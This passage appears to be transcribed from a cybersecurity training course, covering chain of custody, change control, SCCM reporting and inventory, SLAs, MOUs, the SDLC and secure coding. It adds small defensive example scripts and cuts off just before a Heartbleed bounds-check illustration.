that they will no longer be able to communicate wirelessly. In some cases, it might be required that we take
photographs of equipment or computer screens in terms of the state they were discovered in. Also we can't
forget other devices like scanners and printers. They could have document history in their logs that could be
relevant in terms of evidence. And, of course, security camera footage can also be very useful.
The storage of evidence has to be accounted for. Now we should be storing certain items that are susceptible to
electrostatic discharge or ESD in antistatic bags. Labeling is also crucial in terms of storing evidence and
especially if it's going to be stored for the long term and perhaps called up in the future. A Faraday bag once
again can be used to store evidence. We also must log any movement of that evidence between different
storage locations down to the minute in terms of tracking date and time.
We should also make sure that we keep evidence away from magnetic fields. Some evidence such as that on a
traditional hard disk drive is susceptible to being wiped or data being damaged or destroyed from strong
magnetic fields. Climate controlled storage rooms are normally used to store evidence. We should also
consider the fact that some items – for example, a laptop that might have been seized during an investigation –
have internal batteries such as a CMOS battery used to keep the date and time, and these do run out eventually.
So, whether it is 5 years or 10 years or 12 years, the battery will eventually no longer supply the power needed
to keep track of the date and time on that local machine. So we have to keep that in mind as well when it comes to some
electronic equipment. On the screen, you'll see a sample of a chain of custody form. And it includes things
such as a case number – if it's being used in legal proceedings – the offense type for seized equipment, the first
responder's identifying information, the suspect's identifying information, the date and time, and the location
the data was gathered or seized. We might also have labeling information and so on. Now, whenever this
evidence is released or received – say someone is taking it out to use it or putting it back into storage – all of
this has to be logged with detailed comments. In this video, we discussed the chain of custody
form.
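As a supplementary illustration (not part of the video), the sketch below shows how a chain of custody record might be captured programmatically, pairing each release or receipt of an evidence image with a SHA-256 hash so integrity can be re-verified later. The field names, file path, and handler name are hypothetical; a real form follows the organization's and jurisdiction's requirements, and hashing complements rather than replaces documented procedures.

import hashlib
import json
from datetime import datetime, timezone

def sha256_of(path, chunk_size=1024 * 1024):
    """Hash an evidence image so its integrity can be re-verified later."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def custody_entry(case_number, item_label, image_path, handler, action, comments=""):
    """Build one chain of custody record for an evidence transfer or access."""
    return {
        "case_number": case_number,
        "item_label": item_label,
        "sha256": sha256_of(image_path),
        "handler": handler,
        "action": action,            # e.g. "released", "received", "returned to storage"
        "timestamp_utc": datetime.now(timezone.utc).isoformat(),
        "comments": comments,
    }

if __name__ == "__main__":
    entry = custody_entry("2016-0042", "HDD image - suspect laptop",
                          "evidence/laptop.img", "J. Smith",
                          "received", "Signed out for analysis")
    print(json.dumps(entry, indent=2))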
[Topic title: Change Control Processes. The presenter is Dan Lachance.] Change is normally good. But
sometimes, in the IT world, changes can cause more problems than they might solve. In this video, we'll talk
about the change control process. The change control process is a structured approach to IT system change.
Changes then are made in a controlled manner. And changes are all documented. Now, by documenting
anything that changes over time, we are facilitating troubleshooting. If a change is made, for instance, to the
configuration of a network service on a file server and no one has documented that change, only the person
that made the change knows it happened.
That change could alter how things are presented out on the network, and it could cause problems. If we don't
have that information when we're troubleshooting, it takes much longer to arrive at a resolution.
The change control process is certainly related to remediation where we might change a flawed configuration,
for example, that exposes a vulnerability. So think, for instance, of a network where we might have numerous
Windows computers that have remote desktop enabled.
And we may want to disable it because we either don't need that type of remote control solution or we're using
something else. So, using a change control process, we can go through the proper channels and procedures to
put our setting into effect to disable remote desktop. Proposing a change means identifying the benefits that
will be realized as a result of the change. We have to determine the impact that the change would have on the
network. So, for example, disabling remote desktop would arguably decrease the attack surface unless, of
course, there's another remote control solution being put in its place.
Then, of course, come the implementation details, where we have to deal with the cost and any system downtime
that results from implementing a change. Downtime doesn't always happen, but it could in some cases. There
should also be a timeline for when the change can be expected to be fully in effect. So we need to document the change
procedure and the results.
Organizations will normally use either a physical or more often than not a digital change request form that
technicians must fill in and send off for approval. It's a formal document detailing the requested change. And,
after management approval, it can proceed. The change log is an audit trail of related activities. And, in
order for a change log to be meaningful, everybody has to be using their own unique user accounts so that
things are tracked and people are therefore accountable.
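As a supplementary sketch (not from the video), a change log entry can be captured as simply as appending a structured record per change. The field names and the ticket identifier are hypothetical examples; most organizations use a dedicated change management or ITSM tool rather than a flat file.

import json
from datetime import datetime, timezone

def log_change(logfile, device, change, requested_by, approved_by, ticket):
    """Append one audit-trail record to a change log (JSON Lines format)."""
    record = {
        "timestamp_utc": datetime.now(timezone.utc).isoformat(),
        "device": device,
        "change": change,
        "requested_by": requested_by,   # unique user accounts keep people accountable
        "approved_by": approved_by,
        "ticket": ticket,               # hypothetical change request identifier
    }
    with open(logfile, "a", encoding="utf-8") as f:
        f.write(json.dumps(record) + "\n")
    return record

if __name__ == "__main__":
    log_change("change_log.jsonl", "FS01",
               "Disabled Remote Desktop via Group Policy",
               "jsmith", "itmanager", "CHG-1042")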
Part of the change control process also includes monitoring the behavior post change. It's usually not good
enough to implement a change after having gone through the proper procedures and then just saying we're
ready to go. The change is good. There are no negative effects. You need to monitor it. And how long you
should monitor it is up for debate. It depends on the nature of the change and the organization's policies. But
we want to make sure that the change results in improvements and doesn't degrade anything.
Examples of things that are affected by a change control process include the approval of software updates.
Now there's a great example of where normally, yes, software updates improve things, make things more
stable, add new features, remove security holes. But, in some cases, if you've been doing IT for a long time,
I'm sure you'll agree that in some cases when you apply software updates, it can actually break things or make
some things worse.
Another example that is affected by the change control process is certainly the reconfiguration of firewall rules
or encryption of data at rest or perhaps the containerization or partitioning of smartphones so that we separate
personal apps, settings, and data from corporate apps, settings, and data. In this video, we discussed the change
control process.
In this video, you will determine which type of report provides the best data for a specific situation.
Objectives
determine which type of report provides the best data for a specific situation
[Topic title: Types of Reports. The presenter is Dan Lachance.] In this video, we'll talk about different types
of reports.
Reports can come from a variety of sources as related to IT management and security management. And, of
course, having different reports can support decision-making for decision-makers. Now, in some cases, there
might be requirements for report retention. Now, for instance, we might have to keep report information
related to security breaches for a certain period of time by law. It's always important to be able to authenticate
the data that is used to generate reports. Is it trustworthy?
So often that means that it must be stored and transmitted in an encrypted format and have limited access to it.
Reports can be generated manually. So, for example, we can run an on-demand report perhaps to check to see
how many machines meet a certain security condition or not, and that could be done as needed. But it can also
be automated. So we could run reports on a scheduled basis whereby perhaps at the end of every week, a report of the
latest malware infections is sent to the administrative team.
There could also be triggered reports that are triggered by a certain event that occurs. And that might be related
to an intrusion detection or prevention system. And then there is the SIEM option. SIEM stands for security
information and event management. Essentially, it's a centralized monitoring management solution for larger
networks. Standard report types include things such as general user activity either on a single host or over the
network, system downtime, configuration changes, log event correlation to tie events together, helpdesk
tickets, network traffic in and out. And this is just a tiny sampling of standard report types.
Security report types would include things such as privilege use. So, when users are exercising their right, for
example, to reboot a server, we might want to track that and then report against that. Unauthorized attempts to
access data; malware detections – always very important; brute-force password attacks; even excessive
network traffic from a host is suspicious and again that might be picked up by your intrusion detection sensors
and you might get a notification as a result. Remember that intrusion prevention differs from detection in that it
can stop a suspicious activity from continuing.
We might also want a report that summarizes incidents that have occurred over a certain time frame. Or, if
we've had a security audit conducted, part of that might include a penetration or vulnerability test or scan. So
we might have reports related to that. Again, reports are important because they support decisions. And often
decision-makers are not the IT technicians working in the trenches so to speak. So they need a higher-level
overview. They need to trust that the data is accurate on which they are basing their decisions. And that data
would be used for reports.
Reports can also be subscribed to in various types of solutions either on a scheduled basis for individual
reports that are of interest or perhaps reports could be stored in a file or even sent via e-mail. What you're
seeing on the screen now is Microsoft System Center Configuration Manager 2012 R2. [The System Center
Configuration Manager (Connected to S01 - First Site) window is open. The Search tab is open, it includes
various options such as All Objects, Saved Searches, and Close. The window is divided into two sections. The
first section is the navigation pane which at the bottom left contains four tabs named Assets and Compliance,
Software Library, Monitoring, and Administration. The Assets and Compliance tab is selected by default
which includes various nodes such as Overview, User Collections, and Device Collections. The second section
is the content pane, which displays information regarding the selected tab.] Now this tool allows us to manage
a large amount of devices within the enterprise for change management purposes. But it also includes hundreds
of reports. Let's get to that.
So, in the bottom left, in the navigation area, I'm going to switch over to the Monitoring area. And then, in the
left-hand navigator, I'm going to expand Reporting [He clicks the Monitoring tab which includes various
nodes such as Overview, Reporting, and System Status. He clicks the Reports subnode under Reporting
node.] where I can also expand Reports to see numerous categories of Reports. [The Reports subnode includes
various folders such as Administrative Security, Alerts, and Asset Intelligence.] For instance, I see an Alerts
category where if I select that report folder on the left, I'll see the reports on the right. [In the content
pane.] And, as we keep going further and further down, we're going to see all the different types of reports.
But, of course, we could search for them.
So, if I just click on Reports on the left and then click the Search bar on the right, if I wanted to, I might search
for malware. And here we have some various malware reports that might be of interest, such as Antimalware
activity report. So I could right-click on it, [He right-clicks the Antimalware activity report. As a result, a
flyout appears which includes various options such as Run, Edit, and Create Subscription.] choose to Run the
report. [The Antimalware activity report dialog box appears. In the dialog box, the following Report
Description is highlighted: The report shows an overview of antimalware activity.] Now some reporting
solutions will have parameters, in other words, you have to supply further information on which the report will
run. For example, that might include a date and time range.
Now when we run a report, it might be good on screen. We might be able to print it. We might be able to save
it in a variety of different file formats. So here this Antimalware activity report has a Start Date and an End
Date, so there's a time frame. [The Antimalware activity report has two sections. The first section contains a
text box and two drop-down boxes. And there is also a View Report button adjacent to them. The Collection
Name text box contains a hyperlink named Values adjacent to it. In Start Date drop-down box, 8/19/2016 is
selected by default. And in End Date drop-down box, 8/26/2016 is selected by default. The second section is
blank. He clicks the Values hyperlink. As a result, Parameter Value dialog box opens which contains a Filter
field and below that three options: Collection Name, All Systems, and Windows 7 Devices. At the bottom of the
dialog box are OK and Cancel buttons.] But it also has a collection of devices that it must be based on. So
here I'm going to choose the All Systems collection. I'll click OK. Then I'll click the View Report button. And
then the report results will show up down below. [In the second section of the dialog box.]
Now this is one of those types of reports where no news is good news. We have zero antimalware activity.
That's a good thing. But notice here [At the top of the second section are various tools such as Print, Print
Layout, Page Setup, and Save drop-down list box.] that we've got options to Print. We also have various
options to control the Print Layout and we also can save the report in various file formats, [The Save drop-
down list box includes various options such as PDF, Excel, and Word.] perhaps as a PDF that we would
manually attach to an e-mail and send off to our IT manager and so on. [He closes the Antimalware activity
report dialog box.] But, on the automation side, we can also right-click on a report and we can Create
Subscription to it.
[The Create Subscription Wizard opens. The wizard is divided into two sections. The first section includes
various options such as Subscription Delivery and Summary. The Subscription Delivery option is selected by
default. The second section is the content pane which includes various text boxes and drop-down list
boxes.] Now subscribing to a report means you find that report interesting and you might even want to
schedule how often the report runs and you get a copy. So the report could be delivered in this specific
example to a Windows File Share, or it could be sent through E-mail [In the second section, the Report
delivered by drop-down list box contains two options, Windows File Share and E-mail. He selects the E-mail
option. As a result, various text boxes, drop-down list boxes, and checkboxes appear. The text boxes contain
To, Cc, Bcc, Reply-To, Subject, Comment, and Description. The drop-down list boxes contain Priority in
which Normal is selected by default and Render Format in which XML file with report data is selected by
default. There are two checkboxes named Include Link and Include Report under Description text box. At the
bottom of the wizard are four buttons named Previous, Next, Summary, and Cancel.] to interested parties
where we can include a link to the report or actually include a copy of the report, [He selects the Include
Report checkbox.] for example, here in (Acrobat) PDF format. [He clicks the Render Format drop-down list
box which includes various options such as XML file with report data, Acrobat (PDF) file, and Excel. He
selects Acrobat (PDF) file option.]
So, as we go through with this, we can continue to configure things like the schedule. So I'm just going to put
here [He types [email protected] in the To text box.] [email protected]. This is the e-mail
recipient group. And the Subject is going to be Malware Report. Now, when I click the Next button down at
the bottom, [He clicks the Next button. As a result, Subscription Schedule suboption is selected under the
Subscription Delivery option. There are two radio buttons named Use shared schedule, adjacent to that is a
drop-down box and Create new schedule which is selected by default. The Create new schedule contains radio
buttons such as Hourly, Daily, Weekly, Monthly, and Once. He selects the Weekly radio button which includes
various checkboxes such as Mon, Tues, and Sun. There are two fields to set Start time and Begin on, and a
checkbox named Stop on. The Start time is set to 02:03PM. The Begin on is set to 8/26/2016. The Stop on
checkbox is not selected.] then I can determine what the schedule is going to be – should it run Weekly,
Monthly, and so on.
[Topic title: Service Level Agreement. The presenter is Dan Lachance. The Amazon EC2 SLA web page is
open. The web page is divided into two parts. The first part is the navigation pane which contains PRODUCTS
& SERVICES and RELATED LINKS sections. The PRODUCTS & SERVICES section includes various options
such as Amazon EC2, Pricing, and FAQs. The RELATED LINKS section includes various links such as
Amazon EC2 Dedicated Hosts and Amazon EC2 Spot Instances. The second part is the content pane which is
titled Amazon EC2 Service Level Agreement. It contains various sections such as Last Updated June 1, 2013,
Service Commitment, Definitions, Service Commitments and Service Credits, Credit Request and
Payment Procedures, and Amazon EC2 SLA Exclusions.] In this demonstration, we'll take a look at an
example of a Service Level Agreement. The Service Level Agreement or the SLA is a contract between the
provider of a service and a consumer of that same service. Now it doesn't have to exist externally. It could exist
within a larger organization; for instance, the IT department might use it for chargeback to individual
departments that require IT services.
But here we're looking at the Amazon Web Services' EC2 Service Level Agreement. EC2 is the platform in the
Amazon Web Services cloud where we can launch virtual machines. Now a Service Level Agreement has a
number of different sections. Let's take a look at this example one. We're always going to be concerned, of
course, with how recent it is, [He refers to the Last Updated June 1, 2013 section.] so any updates we want to
make sure we're aware of. Then we get down to the definition of terms [He scrolls down to the Definition
section.] – in this case – for the Monthly Uptime Percentage and how those numbers are calculated or derived.
Now here [In the Definition section.] Amazon Web Services is talking about Regional Unavailability or
simply general Unavailability for an Amazon EC2 instance or for its attached disk volumes, which are
EBS volumes. Now they also define the term Service Credit here because what's common with cloud providers
certainly is that if they don't honor or meet the terms in the SLA, one of the consequences from them to the
service consumer – in this context the cloud customer – is service credits given to the customer.
So let's go down and take a look at this a little bit further. So here [In the Service Commitments and Service
Credits section.] we can see the Monthly Uptime Percentage. It says here, if it's Less than 99.95% but equal to
or greater than 99.0%, then we can see the Service Credit Percentage for that specific type of value, which – in
this case – is 10%. Now, if the Monthly Uptime Percentage is less than 99.0%, then Amazon Web Services in
this case is on the hook for a 30% Service Credit Percentage to the customer.
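As a supplementary worked example based on the credit tiers just described, the Python sketch below maps a monthly uptime percentage to the corresponding service credit percentage. The helper function and the sample downtime figure are illustrative; the authoritative definitions and calculation are the ones in the provider's SLA itself.

def ec2_service_credit_percent(monthly_uptime_percent):
    """Return the service credit tier described in the SLA shown above."""
    if monthly_uptime_percent < 99.0:
        return 30
    if monthly_uptime_percent < 99.95:
        return 10
    return 0

if __name__ == "__main__":
    # Example: roughly 4 hours of unavailability in a 30-day month.
    downtime_hours = 4
    uptime = 100 * (1 - downtime_hours / (30 * 24))   # about 99.44%
    print(round(uptime, 2), "% uptime ->", ec2_service_credit_percent(uptime), "% credit")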
Now it says here that Service Credits are applied against future Amazon – in this case, EC2 or EBS volume
payments. Now an important part of an SLA is how these consequences are dealt with. In other words, how do
we, as the consumer, redeem these credits if we don't receive the promised monthly uptime? So here it talks
about the credit request and payment procedures that must be followed. The general
concepts are going to be the same, whether you're looking at Rackspace in the cloud or Microsoft Azure,
Office 365 or in this case, it happens to be Amazon Web Services.
Then, of course, [He scrolls down to the Amazon EC2 SLA Exclusions section.] there will often be some kind
of listing that excludes certain circumstances from the consequences or from the Service Level Agreement.
Now we don't want to go away thinking that the Service Level Agreement is entirely on the provider. In the
case of cloud computing, it really depends on the specific type of service, for example, infrastructure as a
service, which is what this is classified as. Because we're talking about virtual machines, a lot of the
responsibility, at least for configuration and management, is on the consumer. Of course it's running on
provider equipment, so the provider is responsible for making sure that it is up and running. In this video, we took a look
at a sample Service Level Agreement.
After completing this video, you will be able to explain the purpose of a MOU.
Objectives
[Topic title: Memorandum of Understanding. The presenter is Dan Lachance.] Dealing with cybersecurity is
much more than just running the tools and conducting penetration tests. It also includes documentation in the
form of things such as memorandums of understanding. A memorandum of understanding is often referred to
as an MOU. It's an agreement between parties to achieve a common objective. However, it's not legally
binding or enforceable. So therefore, the memorandum of understanding is less formal than a contract or a
service-level agreement. The MOU is written and it will consist of items such as an offer, acceptance, the
intention of the document, and additional considerations between the two parties.
A memorandum of agreement is referred to as an MOA. Now this, as opposed to an MOU, is legally binding
and enforceable. It's an agreement between parties again to achieve a common objective and it can be verbal or
written. An MOA consists of an offer and acceptance. Now there are many similarities, of course, between
both the memorandum of understanding and the memorandum of agreement. Both of them share a common
objective that both parties strive for. It is a structured approach to meeting shared objectives. And it involves at
least two parties if not more.
The service-level agreement is different. The SLA is a contract between a provider and consumer of a service
where there are things like performance expectations, response times that must be met, and also consequences.
So there could be some kind of a monetary penalty or a credit penalty where, for instance, if a cloud provider
doesn't provide the uptime that they promised in the SLA, then the cloud customer gets credits towards the
next month's cloud computing charges. In this video, we discussed a memorandum of understanding.
10. Video: Asset Inventory (it_cscybs_05_enus_10)
In this video, find out how to use existing inventory to drive security-related decisions.
Objectives
[Topic title: Asset Inventory. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
asset inventory.
Organizations can classify many different types of assets including personnel, equipment, IT systems, data,
and so on. Here we're talking about asset inventory for computing devices. And, instead of going around and
gathering that physically and manually, there are many centralized enterprise-class automated ways to gather
inventory.
[The System Center Configuration Manager (Connected to S01 - First Site) window is open. Running along
the top of the page there are three tabs named Home, Collection, and Close. The Collection tab is open by
default, it includes various options such as Add Selected Items, Install Client, and Properties. The window is
divided into two sections. The first section is the navigation pane which at the bottom left contains four tabs
named Assets and Compliance, Software Library, Monitoring, and Administration. The Assets and
Compliance tab is selected by default which includes various nodes such as Overview, Devices, and Device
Collections. The Toronto Devices subnode is selected by default under Devices node. The second section is the
content pane, which contains two subsections.] Here, in Microsoft System Center Configuration Manager or
SCCM, we can go to the Assets and Compliance workspace which I've already clicked on in the bottom left.
On the left, we can then view our Devices. Now here managed devices will be listed under the Client
column [He clicks the Devices node. As a result, a table with column headers titled Icon, Name, Client, Site
Code, and Client Activity is displayed. The column header Name includes various entries such as 192.168.1.1,
CM001, WIN10, and WIN7.] with the value of Yes. For instance, here I've got a WIN10 computer and if I
right-click on it, [He right-clicks the WIN10 and a shortcut menu appears which includes various options such
as Add Selected Items, Start, and Block. He clicks the Start option and a flyout appears which includes
Resource Explorer and Remote Control options.] I can choose Start and I can then click on the Resource
Explorer option to open up a new window. [The System Center Configuration Manager - Resource Explorer window
is open. The window is divided into two sections. The first section contains a node named WIN10 and three
subnodes named Hardware, Hardware History, and Software. The second section is the content pane.] I'll just
maximize that window where I can view any hardware inventory related to that specific machine. [He
clicks the Hardware subnode and various hardware categories are displayed in the content pane. And then he expands
the Hardware subnode which further includes various subnodes such as Installed Software, Memory, and
Motherboard.]
So, instead of going to that machine or remote controlling it to find out things, such as Installed Software,
Memory, Motherboard details, and so on, I can centrally view it here. Now, not only can I view things
like Hardware inventory, but if it's been configured, I'll also be able to view any Software inventory. [He
clicks the Software subnode which includes various subnodes such as Collected Files and Product Details.
The Product Details contains further subsections named Microsoft Corporation and Microsoft Inc.] Now what
this will show me is any scanned software, categorized by company – in this case, Microsoft
Corporation.
But I can also expand the list and view other product details and vendor solutions for software that are installed
on our machine. Now again, this inventory could be very relevant. If I want to deploy a new patch or another
piece of software, it might require that an existing piece of software already be out there. Now, in the same
way, here in the SCCM tool, what I could also do on the left is go to the Monitoring workspace [He clicks the
Monitoring tab which includes various nodes such as Overview, Reporting, and System Status. He clicks the
Reports subnode under Reporting node. The Reports subnode includes various folders such as Hardware -
General and Software - Companies and Products.] where I can then run Reports based on my inventoried
assets.
So, for instance, if we were to scroll down to the hardware section, we would see that we could choose, for
instance, from the Hardware - General category, [He clicks the Hardware - General folder. As a result, a table
is displayed in the content pane with column headers such as Icon, Name, Category, and Date Modified. There
are five rows under the Name column header such as Computer Information for a specific computer and Dan
CustomReport1.] a "Computer information for a specific computer" type of report and we could right-click
and Run the report or Create Subscription to it, for example, if we want this mailed to us automatically on a
periodic basis. So there are other ways to also take a look at our assets in terms of software that has been
inventoried.
So, if I were to go to the Software - Companies and Products folder on the left, I would see numerous reports
over on the right, such as, for instance, the report called "Count inventoried products and versions for a
specific product". Now the other thing about asset inventory, in the case of computing devices in this particular
tool as well, is that under the Assets and Compliance workspace, I could now build a new device collection. So
I'll right-click on the Device Collections link in the left-hand navigator [He right-clicks the Device collection
node. As a result, a shortcut menu appears which includes Create Device Collection and Import Collections
options.] to choose Create Device Collection. [The Create Device Collection Wizard is open. The wizard is
divided into two sections. The first section contains options such as General, Membership Rules,
Summary, Progress, and Completion. The General option is selected by default. The second section is the
content pane which includes three text boxes such as Name, Comment, and Limiting collection. In the Name
text box, Test is written. The Comment text box is blank. The Limiting collection text box is blank and adjacent
to that is a Browse button. At the bottom of the page are four buttons named Previous, Next, Summary, and
Cancel.] We're going to call this Test and for the Limiting collection, I'll click Browse and choose All
Systems [The Select Collection dialog box opens. The dialog box has two sections. The first section contains a
drop-down list box in which Device Collections is selected by default and a node named Root which is selected
by default. The second section contains a table with column headers Name and Member Count. The entries
under the Name header are All Desktop and Server Clients, All Mobile Devices, All Systems, and All Unknown
Computers. He clicks the All Systems entry with a Member Count of 7. At the bottom of the dialog box are OK and
Cancel buttons. He clicks the OK button.] as a starting point and I'll click Next.
Then, [He clicks the Membership Rules option on the Create Device Collection Wizard. The content pane
includes a table with column headers named Rule Name, Type, and Collection ID. Under the table there is an
Add Rule drop-down list box which includes Direct Rule and Query Rule options. There are two checkboxes
below that named Use incremental updates for this collection and Schedule a full update on this collection.
The Schedule a full update on this collection checkbox is selected by default.] using the Add Rule button on the
next screen of the wizard, I'm going to choose a Query Rule. And I'm going to call this Query1. And then I'll
choose Edit Query Statement. [He clicks the Query Rule option from the drop-down box. As a result, Query
Rule Properties dialog box appears where in the General tab there are two text boxes and a drop-down box.
In the Name text box, he types Query1. Below that there is an Import Query Statement button. In the Resource
class drop-down box, System Resource is selected by default. Below that there is an Edit Query Statement
button. In the Query Statement text box, Select * from SMS_R_System is written by default. At the bottom of the
dialog box are OK and Cancel buttons. He clicks the Edit Query Statement button. As a result, Query
Statement Properties dialog box opens which contains three tabs named General, Criteria, and Joins.] Now
the point here is that if we've got asset inventory already done in terms of hardware and software for
computing devices, then it really lends itself quite nicely to building collections of computers based on that
gathered inventory. For example, if I were to go to the Criteria tab then click the new criteria button for Simple
value, [The Criterion Properties dialog box opens. In the Criterion Type drop-down list box, Simple value is
selected by default. Below that there is a Where text box which is blank and under that there is a Select button.
The Operator drop-down list box is blank and under that there is a Value text box which is blank and a Value
button. He clicks the Select button.] I'm going to click the Select.
And, if we take a look here [The Select Attribute dialog box is open. The dialog box contains Attribute class,
Alias as, and Attribute drop-down list boxes. He clicks the Attribute class drop-down list box. As a result, a list
appears which includes various classes such as 1394 Controller Extended History, Antimalware Health
Status, AutoStart Software, BitLocker, Desktop Monitor, and Disk Partitions.] at this list of attribute classes,
look at all the different things that we could build a new collection of devices based on – Antimalware Health
Status, any AutoStart Software, whether BitLocker is configured in a certain manner on the machine, we go
further down, even the type of Desktop Monitor that's being run, even the number of Disk Partitions can be
queried, and so on.
So, once we've got asset inventory automated from a central location, it supports decision-making. We can run
reports, and it facilitates other IT functions such as building device collections containing only devices that
have certain characteristics.
Table of Contents
[Topic title: SDLC Phases. The presenter is Dan Lachance.] In this video, I'll talk about the systems
development life cycle. The systems development life cycle is often referred to as the SDLC. It serves as a
framework with multiple phases that are used to manage complex projects. Secure coding practices can also be
followed when developing IT solutions such as those published by OWASP, the Open Web Application
Security Project, or recommendations from the SANS Institute, and also the Center for Internet Security,
which provides system design recommendations, and even benchmarks. Let's take a look at each phase of the
system development life cycle, beginning with project initiation where the business need is clearly defined
since our solution must address it. After which we then take a look at risk assessments, we assemble a project
team, and we think about the type of data that our solution will deal with – whether it be intellectual property,
Personally Identifiable Information or some other kind of corporate data.
We then must consider the stakeholders that will be involved whether directly or indirectly, including software
developers, network administrators, management, end users – which could also be customers – and of course
any third party involvement. Next, we must determine the functional requirements of the solution. So based on
the business need, what must it actually do? Is it going to be a mobile device application? Will the solution be
used on premises or in the cloud or within a certain physical office space? Are there any legal or regulatory
compliance issues that we have to adhere to? We also should consider whether the application needs to be
highly available. For instance, if it's a mission critical application that the business depends on.
Then, at this point, we must define the security requirements such as authentication – so the proving of one's
identity, encryption of data at rest, and data being transmitted. And we must also define any requirements to
prevent data loss. So, in other words, the unintended leakage of data to unauthorized parties. Next, we actually
get into the system design specifications such as exactly how the security requirements will be met as related
to authentication, encryption, and data loss prevention. So at this point, we're starting to get into some detail
related to security controls. Then we get into the development and implementation phase where the solution,
for example, might be built in the cloud since these days public cloud providers offer platforms, databases,
virtual machines that could be spun up very quickly to build and test a product – and then they can be
essentially deprovisioned when no longer needed.
So it's very quick to get this development environment, and we're only paying for it while we're using it. So it
might make more sense to do that instead of building and developing a solution on premises. Part of
development and implementation is also a peer review, to make sure that we followed secure coding practices
and so on. However, security really needs to be considered through all SDLC phases, not just development and
implementation. In the documentation phase, there are ongoing updates. There's continuous improvement
where we're always assessing our solution to make sure it addresses business needs and that it also addresses
any threats which are ongoing – they're always changing. We can also use documentation for training, for
example, the on-boarding process for new hires.
Lessons learned can also be derived after incidents occur. So really, documentation should apply to all phases
of the SDLC. In the evaluation and testing portion, we should be doing things like enabling verbose logging to
log all application components. We might even then capture network traffic to ensure that what's being
transmitted is what we expect. We might stress test the solution to see how it behaves. Then we would submit
abnormal data as input, and this is often called fuzz testing to see how the application reacts. We want to make
sure that the application doesn't crash or reveal sensitive information as a result of the submission of the
abnormal data. And of course, we need end user acceptance for the solution.
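As a supplementary illustration of the fuzz testing idea mentioned above (not from the video), here is a toy Python harness that feeds random, abnormal input to a parsing function and records anything other than a graceful rejection. The target function is a made-up example; real fuzzing tools generate far smarter inputs and also watch for crashes, hangs, and memory issues.

import random
import string

def parse_date_of_birth(text):
    """Toy parser under test: expects YYYY-MM-DD and returns (year, month, day)."""
    year, month, day = text.split("-")
    return int(year), int(month), int(day)

def fuzz(target, iterations=1000):
    """Feed random, abnormal input to the target and record unexpected failures."""
    failures = []
    alphabet = string.printable
    for _ in range(iterations):
        junk = "".join(random.choice(alphabet) for _ in range(random.randint(0, 40)))
        try:
            target(junk)
        except ValueError:
            pass                  # rejecting bad input gracefully is the desired behavior
        except Exception as exc:  # anything else is a finding worth investigating
            failures.append((junk, repr(exc)))
    return failures

if __name__ == "__main__":
    for sample, error in fuzz(parse_date_of_birth)[:5]:
        print("Unexpected failure on", repr(sample), "->", error)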
In the transitioning to production phase, we have pilot testing, careful observation of the results, and then we
take a look at differences from our production versus our development environment. Despite our best
intentions when testing, sometimes there are variables that just cannot be reproduced in a development or
testing environment. So we have to really observe that in the production environment during the pilot testing.
At the same time, usually what happens is we have to make changes to the documentation, whether it's best
practices for our solution or even core documentation changes based on how it behaves in a production
environment. As with everything, there's ongoing maintenance over time even for the best of solutions, such as
adding user accounts, perhaps making small functional changes as needed, and of course patching problems
that we discover over time. In the end, there is the eventual retirement of our solution. In this video, we
discussed the system development life cycle phases.
[Topic title: Secure Coding. The presenter is Dan Lachance.] In this video, I'll discuss secure coding. One of
the biggest problems with software is the tight timelines under which developers are pressured to deliver a solution. Often, a solution must be pushed out the door as quickly as possible. And the problem with this is that we can't properly apply security techniques if we're always in a rush. So the first thing we should consider then
are best practices related to secure coding, such as those published by OWASP. OWASP is the Open Web
Application Security Project. This is an online resource that has things like secure coding articles,
documentation, and free tools available for developers to use. There's also the SANS Institute, which has a number of whitepapers related to things like secure coding, as well as the Center for Internet Security, which again has a lot of coding and system design recommendations related to security.
But before we can take a look at secure coding best practices, we have to have a clear idea of the security
requirements of the solution that is being built. [The www.sans.org web site opens. The web page includes the
Find Training tab, Live Training tab, Login button, and a search bar. The web page also includes links such
as Secure Authentication on the Internet and Software Engineering - Security as a Process in the SDLC. By
default, in the find result bar, sdlc is written.] Here on the www.sans.org web site, [Dan clicks the down
arrow next to the find result bar and then clicks Software Engineering - Security as a Process in the SDLC
link.] if I were to search for sdlc, the system development life cycle, I can see that there is a Reading Room
document here called Software Engineering – Security as a Process in the SDLC. So, if I were to actually click
on that link and begin reading this documentation, then this would be one of the resources I could use to follow
secure coding practices. And there are many out there on the Internet. [The Software Engineering - Security as
a Process in the SDLC web page opens. The web page includes refresh and download buttons.] So now we
can see the Software Engineering - Security as a Process in the SDLC document loaded here from the SANS
Institute. So this is the type of documentation that we should be going into before we start developing from the
initial phase of the system development life cycle.
[He resumes the explanation of secure coding.] Another invaluable part of secure coding is having a peer
review. This essentially means having other sets of eyes reviewing code, looking for improper secure coding practices or flaws in the code's logic. So therefore, security must be a part of each and every SDLC
phase. A big part of secure coding involves input validation to make sure that the data being fed into an
application is what is expected. We want to make sure that we allocate enough memory to account for valid
data being input. And then, if we're expecting something like a date of birth, we make sure that only dates are
entered into that field before it's processed. We also want to make sure with input validation that we don't
allow executable code to be submitted, for example, on a Web Form field.
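To make this concrete, here is a minimal PowerShell sketch of input validation for a hypothetical date-of-birth field (the function name, field format, and length limit are illustrative assumptions, not part of the demo):

function Test-DateOfBirthInput {
    param([string]$DateOfBirth)

    # Reject oversized input before doing anything else
    if ($DateOfBirth.Length -gt 10) { return $false }

    # Only accept an exact date format such as 1990-05-21
    $parsed = [datetime]::MinValue
    if (-not [datetime]::TryParseExact($DateOfBirth, 'yyyy-MM-dd',
            [System.Globalization.CultureInfo]::InvariantCulture,
            [System.Globalization.DateTimeStyles]::None, [ref]$parsed)) {
        return $false
    }

    # A date of birth can't be in the future
    return ($parsed -le (Get-Date))
}

Anything that fails the check is rejected before it is processed, which follows the allow-list style of validation rather than trying to filter out known-bad input.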
So this is all part of our security requirements definition when we build our solution. As an example of a secure coding problem, consider the Heartbleed bug, an SSL/TLS bug – specifically an OpenSSL vulnerability – that allowed access to data that would normally be secured with SSL and TLS. The problem with the way OpenSSL was coded (it has since been fixed) is that it lacked a check comparing the payload length claimed by the client, in bytes, against the size of the data that was actually transmitted. Because this wasn't checked properly on the server side, the client was able to read server memory contents beyond what was allocated for the variable containing the client data.
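As a rough illustration of the missing check – this is PowerShell-style pseudologic with hypothetical variable names, not the actual OpenSSL code – the server should have compared the claimed length against what actually arrived:

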